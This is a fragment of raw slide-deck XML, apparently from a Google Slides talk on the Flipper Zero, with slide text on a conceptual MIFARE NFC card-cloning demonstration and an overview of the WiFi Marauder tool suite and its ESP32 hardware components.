          <p:cNvPr id="164" name="Google Shape;164;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="165" name="Google Shape;165;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="30366" l="33862" r="15278" t="39358"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-937413">
            <a:off x="6690375" y="1118175"/>
            <a:ext cx="1520899" cy="1206475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="166" name="Google Shape;166;p25"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="17651" l="18800" r="17252" t="18438"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5878250" y="2634612"/>
            <a:ext cx="2529275" cy="1896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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1541200" y="1121850"/>
            <a:ext cx="6061500" cy="16545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172" name="Google Shape;172;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3960463" y="1974900"/>
            <a:ext cx="1222200" cy="4002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NFC- MIFARE Token Cloning Demonstration</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="Google Shape;174;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3153925"/>
            <a:ext cx="8520600" cy="8250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Font typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The Flipper will clone the MIFARE NFC Token</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The MIFARE card is cloned by the Flipper first requesting the data, and then the card sending the data.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="175" name="Google Shape;175;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="176" name="Google Shape;176;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="21840" l="5482" r="6381" t="19591"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1541194" y="1170775"/>
            <a:ext cx="2273750" cy="1510875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="177" name="Google Shape;177;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="16324" l="20384" r="26503" t="25888"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5196299" y="1313825"/>
            <a:ext cx="2406501" cy="1367825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Google Shape;178;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3768363" y="1523088"/>
            <a:ext cx="1222200" cy="4002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txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3960463" y="1523075"/>
            <a:ext cx="90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Request</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="Google Shape;180;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4161063" y="1974900"/>
            <a:ext cx="68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Send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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1308688" y="1267675"/>
            <a:ext cx="2104500" cy="22233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5850600" y="1267675"/>
            <a:ext cx="2104500" cy="22233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NFC- MIFARE Token Cloning Demonstration</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Google Shape;188;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3740925"/>
            <a:ext cx="8520600" cy="825000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="62500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-300037" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The RFID reader will react the same for the MIFARE card and the emulated card on the Flipper Zero</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-300037" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>We can see the plaintext data on the MIFARE card with the output of the RFID reader</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="189" name="Google Shape;189;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="190" name="Google Shape;190;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="21840" l="5482" r="6381" t="19591"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1620588" y="1367575"/>
            <a:ext cx="1480700" cy="983900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="191" name="Google Shape;191;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="11742" r="13985" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5858625" y="1267663"/>
            <a:ext cx="2123650" cy="2137075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="192" name="Google Shape;192;p27"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="16324" l="20384" r="26503" t="25888"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1576763" y="2513300"/>
            <a:ext cx="1568375" cy="891425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;p27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4056938" y="2362000"/>
            <a:ext cx="1222200" cy="4002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rot="10800000">
            <a:off x="3864838" y="1910188"/>
            <a:ext cx="1222200" cy="4002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95" name="Google Shape;195;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4056938" y="1910175"/>
            <a:ext cx="90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Request</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Google Shape;196;p27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4275638" y="2361988"/>
            <a:ext cx="68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Send</a:t>
            </a:r>
            <a:endParaRPr>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8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="23331" l="8105" r="7378" t="25681"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2897950" y="1858100"/>
            <a:ext cx="3348100" cy="2693175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Google Shape;202;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3757050" y="1334975"/>
            <a:ext cx="1629900" cy="73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891"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FF8A0D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WiFi</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4000">
              <a:solidFill>
                <a:srgbClr val="FF8A0D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="203" name="Google Shape;203;p28"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736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8A0D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Flipper Zero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FA0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>WiFi Marauder</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FA0000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="Google Shape;20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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The Flipper does not natively support WiFi</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>WiFi can be added to the Flipper through the GPIO and a module </a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="210" name="Google Shape;210;p29"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736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A0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>WiFi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FA0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Marauder</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FA0000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="8520600" cy="1658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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Suite of WiFi and Bluetooth Offensive and Defensive tools</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Created by GitHub user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="FA0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>justcallmekoko</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="FA0000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Firmware hosted on a ESP-32 System on a Chip (SoC)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="217" name="Google Shape;217;p30"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407525" y="67075"/>
            <a:ext cx="736475" cy="736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A0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>WiFi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FA0000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Marauder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>- Components</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="Google Shape;22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Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>ESP32</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>External </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Antenna (optional)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>SD card board (optional)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Flipper Zero</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Roboto Mono"/>
